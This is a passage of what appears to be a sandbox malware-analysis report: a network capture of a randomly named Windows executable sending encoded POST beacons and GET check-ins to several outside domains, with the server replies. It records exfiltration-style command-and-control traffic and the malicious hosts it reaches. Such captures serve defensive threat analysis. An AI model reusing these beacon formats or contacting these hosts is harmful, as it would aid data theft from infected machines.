2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49727	209.74.79.40	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:36:21.689718008 CET	544	OUT	GET /bhaz/?HBa8C=1TmdP6ixExB8DV&5t=d3C+EkBuN5s1g6Sv3GF5Q4rw9r47fZ2/rALJg63gfJf8n+sIpfLA3JNW/O2di/HTM2qVhQtzuGVJ+YLVpF6sno4g+T4cgfV0eNxqgD8f0kMZrnEaQO6gqyS7ZB9ZPZm+NQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.futurexz.xyz User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:36:22.283224106 CET	548	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:36:22 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49728	136.243.225.5	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:36:27.349263906 CET	809	OUT	POST /wzdf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/wzdf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 75 44 6c 43 59 67 30 45 7a 4c 74 55 6f 56 41 53 41 4a 61 66 41 43 68 43 6a 65 6d 4a 77 50 4d 73 63 6f 6f 66 44 49 4d 41 54 66 5a 30 72 6d 47 56 4d 4a 69 75 61 70 34 4e 4d 73 31 53 33 4c 33 54 46 52 4d 68 66 70 4d 4c 75 43 58 4f 44 50 50 61 4b 39 37 52 35 6b 4a 59 4b 74 5a 53 37 4f 7a 2f 72 4a 30 4b 45 39 69 4a 31 47 76 59 70 63 43 32 62 2f 44 32 38 62 2f 52 67 65 45 54 79 65 4a 6f 4e 56 51 33 57 46 51 79 47 6c 48 49 34 30 6a 4c 51 47 45 6a 42 43 4c 57 2b 30 54 61 37 55 68 50 7a 4c 63 78 4a 65 4b 48 59 73 72 63 36 6c 36 57 56 4d 6a 41 49 7a 79 41 42 4b 4c 61 65 4f 56 62 49 54 5a 6b 2b 7a 67 3d Data Ascii: 5t=uDlCYg0EzLtUoVASAJafAChCjemJwPMscoofDIMATfZ0rmGVMJiuap4NMs1S3L3TFRMhfpMLuCXODPPaK97R5kJYKtZS7Oz/rJ0KE9iJ1GvYpcC2b/D28b/RgeETyeJoNVQ3WFQyGlHI40jLQGEjBCLW+0Ta7UhPzLcxJeKHYsrc6l6WVMjAIzyABKLaeOVbITZk+zg=
Jan 11, 2025 05:36:27.980914116 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Sat, 11 Jan 2025 04:36:24 GMT location: https://www.myfastuploader.sbs/wzdf/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49729	136.243.225.5	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:36:29.894958019 CET	829	OUT	POST /wzdf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/wzdf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 75 44 6c 43 59 67 30 45 7a 4c 74 55 36 6c 51 53 51 65 75 66 52 69 68 4e 6d 65 6d 4a 2b 76 4d 67 63 6f 30 66 44 4e 73 71 54 74 4e 30 71 44 36 56 4e 4e 57 75 64 70 34 4e 59 38 31 54 36 72 33 49 46 52 49 58 66 72 6f 4c 75 43 7a 4f 44 4c 4c 61 4a 4b 50 53 35 30 4a 67 47 4e 5a 55 31 75 7a 2f 72 4a 30 4b 45 39 6d 76 31 47 33 59 70 50 61 32 61 64 72 31 69 4c 2f 51 33 75 45 54 34 2b 49 68 4e 56 51 56 57 45 39 6c 47 6a 4c 49 34 32 4c 4c 52 58 45 67 4c 43 4c 55 39 45 53 74 72 58 34 41 36 4a 41 72 44 34 62 6f 54 50 76 34 32 7a 4c 38 50 75 72 47 4c 7a 61 72 42 4a 6a 73 62 35 49 7a 53 77 4a 55 67 6b 30 53 58 36 2f 4c 44 63 38 39 6b 50 69 32 4a 73 74 67 66 79 62 46 Data Ascii: 5t=uDlCYg0EzLtU6lQSQeufRihNmemJ+vMgco0fDNsqTtN0qD6VNNWudp4NY81T6r3IFRIXfroLuCzODLLaJKPS50JgGNZU1uz/rJ0KE9mv1G3YpPa2adr1iL/Q3uET4+IhNVQVWE9lGjLI42LLRXEgLCLU9EStrX4A6JArD4boTPv42zL8PurGLzarBJjsb5IzSwJUgk0SX6/LDc89kPi2JstgfybF
Jan 11, 2025 05:36:30.511781931 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Sat, 11 Jan 2025 04:36:27 GMT location: https://www.myfastuploader.sbs/wzdf/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49730	136.243.225.5	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:36:32.446649075 CET	1846	OUT	POST /wzdf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/wzdf/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 75 44 6c 43 59 67 30 45 7a 4c 74 55 36 6c 51 53 51 65 75 66 52 69 68 4e 6d 65 6d 4a 2b 76 4d 67 63 6f 30 66 44 4e 73 71 54 73 31 30 72 32 32 56 4d 73 57 75 63 70 34 4e 45 4d 31 65 36 72 32 4b 46 56 63 4c 66 72 6b 62 75 45 33 4f 44 6f 44 61 4d 37 50 53 32 30 4a 67 4f 74 5a 52 37 4f 79 69 72 50 55 4f 45 39 32 76 31 47 33 59 70 49 69 32 54 76 44 31 67 4c 2f 52 67 65 45 48 79 65 4a 45 4e 56 6f 76 57 45 4a 31 42 54 72 49 35 57 62 4c 57 6c 63 67 44 43 4c 53 34 45 53 31 72 58 46 41 36 4a 64 55 44 34 47 31 54 50 58 34 7a 46 47 42 65 2f 4c 51 57 43 61 73 46 35 37 76 66 72 45 65 59 42 42 2f 71 6b 6b 79 62 61 2f 30 44 76 41 71 6d 76 76 54 56 34 42 41 56 32 4b 51 54 49 49 73 54 6c 36 35 6f 6a 6c 54 66 50 37 64 36 33 78 54 49 77 79 4a 6f 49 49 46 6b 42 69 33 65 34 2f 38 30 53 2f 36 75 51 74 56 41 50 38 70 68 6b 76 52 68 78 5a 53 30 46 43 43 44 4a 6f 33 34 52 30 42 43 79 55 73 46 64 6d 72 74 36 34 37 70 35 72 68 52 43 74 61 59 66 61 4e 7a 59 48 55 43 4e 70 36 43 45 67 71 6a 55 69 69 41 6c 42 57 44 30 6f [TRUNCATED] Data Ascii: 5t=uDlCYg0EzLtU6lQSQeufRihNmemJ+vMgco0fDNsqTs10r22VMsWucp4NEM1e6r2KFVcLfrkbuE3ODoDaM7PS20JgOtZR7OyirPUOE92v1G3YpIi2TvD1gL/RgeEHyeJENVovWEJ1BTrI5WbLWlcgDCLS4ES1rXFA6JdUD4G1TPX4zFGBe/LQWCasF57vfrEeYBB/qkkyba/0DvAqmvvTV4BAV2KQTIIsTl65ojlTfP7d63xTIwyJoIIFkBi3e4/80S/6uQtVAP8phkvRhxZS0FCCDJo34R0BCyUsFdmrt647p5rhRCtaYfaNzYHUCNp6CEgqjUiiAlBWD0oEUOvUh/Byd8tCMl+ONdeldVKuvR6C3dQdZ2tyB4X5XFG7WyIU+ad1jPU7omkQIsqtOJj127OCUr4mroIZvwJkyUUDHIPBg+mcxdgw5bG+TyIHT0N6DFoNnK9Wms0fD4ELH9iSq+NO73o2GZUFK0P3SZSmmsPRfBmISzPZAs/DARW92Gd7ZzKOT0EXmlipgMkDQrTKlizM5/5e2AqSH/Fv9U0CTyjy1U8L8Kwbrf4XR/hx5bYr6WfPs5YqkafjJtuJps3QystJ5UxJoY3QinHZXZiA8vmLa48TztGXWQ7YOJlaV3TouqssbMo3/R6ogb/xeIrnF8bJCjUOGcWz8EEaFFNYyQEoTBnIefZv6puvToswzW2YJhlYc3L6SJ9xB+sjSr3aLF4RcO3L+dgrsE8xCaafr8KWFTWC+qqONYma0RAbyCXXTfUpxgOo8H0w8SHqpqVYR+xZMqJrFeymhGTVWbff7xfYpyXXVuvzvlOly0IbbZT8e6aQ+iiQNDE5rue/DGqo7H6XAshtALvsRaK5kHqHcuIEnqP69qf6BuHAfOCrxZyTI9hMGLS3866DV+Qiry/da6Tw8d8J/VUiuhlRpCWjqJ0e0B6xosAqquRNoig7OH9u1QEZaWyV+ccyR/VNZI39DXMaZIOqwfHN2aMMBAc1PO5llLvz3 [TRUNCATED]
Jan 11, 2025 05:36:33.058439970 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Sat, 11 Jan 2025 04:36:29 GMT location: https://www.myfastuploader.sbs/wzdf/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49731	136.243.225.5	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:36:34.999289989 CET	550	OUT	GET /wzdf/?5t=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/9Z3uNAs5avQYsDK6NbrpTb32/24MPrQp38e7p8QhR5ymoCju/e2gY+T/ibiLi+AS7/Eveg==&HBa8C=1TmdP6ixExB8DV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.myfastuploader.sbs User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:36:35.652158976 CET	1048	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Sat, 11 Jan 2025 04:36:32 GMT location: https://www.myfastuploader.sbs/wzdf/?5t=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/9Z3uNAs5avQYsDK6NbrpTb32/24MPrQp38e7p8QhR5ymoCju/e2gY+T/ibiLi+AS7/Eveg==&HBa8C=1TmdP6ixExB8DV Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49732	185.68.108.243	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:36:40.902158022 CET	803	OUT	POST /8s4j/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.accusolution.pro Origin: http://www.accusolution.pro Referer: http://www.accusolution.pro/8s4j/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 75 76 4a 72 51 7a 72 56 44 7a 63 75 4a 6a 79 69 54 6e 69 37 38 38 64 73 70 63 65 61 6a 42 70 36 39 7a 71 5a 75 5a 58 57 7a 53 33 79 59 72 30 69 72 72 50 31 71 71 35 39 30 4b 4f 4a 68 47 71 57 6e 66 71 6f 63 35 33 52 36 7a 41 79 33 30 39 34 4a 47 31 76 75 2b 53 67 72 63 71 36 37 30 63 6b 49 4d 59 34 69 47 75 55 33 6f 73 58 79 4f 67 2b 53 76 50 67 35 59 72 6c 39 49 70 35 46 63 48 6f 34 63 6d 46 6e 67 71 68 64 56 4a 36 6e 46 2b 77 52 32 73 4e 72 37 36 77 42 68 6a 79 6e 39 72 49 45 58 39 64 31 39 44 58 34 75 4c 74 39 4e 50 35 58 34 48 6e 7a 45 4c 48 72 74 36 46 67 50 48 57 55 70 33 66 54 39 77 3d Data Ascii: 5t=uvJrQzrVDzcuJjyiTni788dspceajBp69zqZuZXWzS3yYr0irrP1qq590KOJhGqWnfqoc53R6zAy3094JG1vu+Sgrcq670ckIMY4iGuU3osXyOg+SvPg5Yrl9Ip5FcHo4cmFngqhdVJ6nF+wR2sNr76wBhjyn9rIEX9d19DX4uLt9NP5X4HnzELHrt6FgPHWUp3fT9w=
Jan 11, 2025 05:36:41.522521019 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 04:36:41 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 11, 2025 05:36:41.522545099 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.8	49733	185.68.108.243	80

Timestamp	Bytes transferred	Direction	Data
